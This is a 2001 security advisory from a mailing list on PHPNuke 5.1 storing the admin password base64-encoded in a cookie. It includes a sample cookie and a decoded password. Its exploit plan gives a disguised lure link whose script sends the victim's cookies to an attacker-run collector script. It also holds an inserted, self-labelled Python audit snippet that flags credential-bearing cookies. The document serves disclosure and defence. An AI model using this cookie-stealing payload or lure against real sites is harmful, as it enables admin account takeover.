[UNIX] PHPNuke Admin Password Can Be Stolen

From: support@securiteam.com
Date: 11/25/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] PHPNuke Admin Password Can Be Stolen
Message-Id: <20011125130805.4E536138BF@mail.der-keiler.de>
Date: Sun, 25 Nov 2001 14:08:05 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  PHPNuke Admin Password Can Be Stolen
------------------------------------------------------------------------

SUMMARY

Vulnerabilities in PHPNuke expose the administrative password. The
vulnerability lies in PHPNuke's insecure storage of the administrator
password in a cookie.

DETAILS

Vulnerable systems:
PHPNuke version 5.1

To successfully exploit this vulnerability you will need to rely on two
other vulnerabilities:

Password BASE64 encoding:
The administrator login/password pair is stored in a cookie like this:
---snip---
lang
english
isecurelabs.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
isecurelabs.com/
0
1451582336
29456384
3432929360
29450340
*
---snip---

Furthermore, the administrator password is BASE64 encoded, making it very
easy to decode.

Example:
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:

You can verify this by using the following PHP script:
http://www.isecurelabs.com/base64.php
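As an added example (not from the advisory, the reporter, or PHPNuke), a small Python audit that parses a cookie dump in the nine-line-per-record layout quoted above and flags cookies whose value base64-decodes to a login:password pair; the sample dump is constructed, and the record layout and the credential pattern are assumptions of the example:

```python
import base64
import re

# Constructed sample in the layout of the dump quoted above
# (assumed layout: name, value, domain/path, flags, expiry low/high,
# creation low/high, and a '*' terminator per record).
SAMPLE_COOKIE_DUMP = """lang
english
isecurelabs.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
isecurelabs.com/
0
1451582336
29456384
3432929360
29450340
*
"""

RECORD_FIELDS = 9  # eight fields plus the '*' terminator

# login:password, optionally followed by a trailing ':' and line ending
CRED_RE = re.compile(r"^([^:\s]+):([^:]*):?\s*$")


def parse_cookie_dump(text):
    """Split the dump into (name, value, domain_path) tuples."""
    lines = text.splitlines()
    records = []
    for i in range(0, len(lines) - RECORD_FIELDS + 1, RECORD_FIELDS):
        chunk = lines[i:i + RECORD_FIELDS]
        if chunk[-1] != "*":
            raise ValueError("malformed record at line %d" % (i + 1))
        records.append((chunk[0], chunk[1], chunk[2]))
    return records


def decode_credentials(value):
    """Return (login, password) if value is base64 of 'login:password[:]'."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None  # not base64, or not printable text
    m = CRED_RE.match(text)
    return (m.group(1), m.group(2)) if m else None


def find_credential_cookies(text):
    """List (domain_path, cookie_name, login) for credential-bearing cookies."""
    hits = []
    for name, value, domain in parse_cookie_dump(text):
        creds = decode_credentials(value)
        if creds:
            hits.append((domain, name, creds[0]))
    return hits
```

Run over a real cookie export, a non-empty result from find_credential_cookies means a site is persisting credentials client-side rather than an opaque session token.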

About: URLs security vulnerability:
As we reported in a previous article, Microsoft IE Cookies Exposure via
'About:' URLs (<http://www.securiteam.com/windowsntfocus/6I00D1535I.html>),
a vulnerability in Internet Explorer allows extraction of cookies stored on
the remote connecting client (even if they are not from our cookie domain).

Exploit plan:
First create a php script that can gather getenv("QUERY_STRING") in a
file. Then create this kind of link and force the PHPNuke administrator to
follow it:

[a href="about://www.nuked-site.com/
[script]window.open("http://www.yourwebsite.com/cook.php?"+document.cookie);[/script]"] Hey,this is the last Bind9 remote root exploit ![/a]
(replace [ and ] with < and >)

Where:
www.nuked-site.com is the site whose cookie you want to obtain.
www.yourwebsite.com is the site that will receive the cookie through the
cook.php script.

If the nuked site's admin follows this link, he will send your script
his cookie with the Base64-encoded password. Then you just have to decode
it.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:aurelien.cabezon@iSecureLabs.com> Cabezon Aurelien.

========================================


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
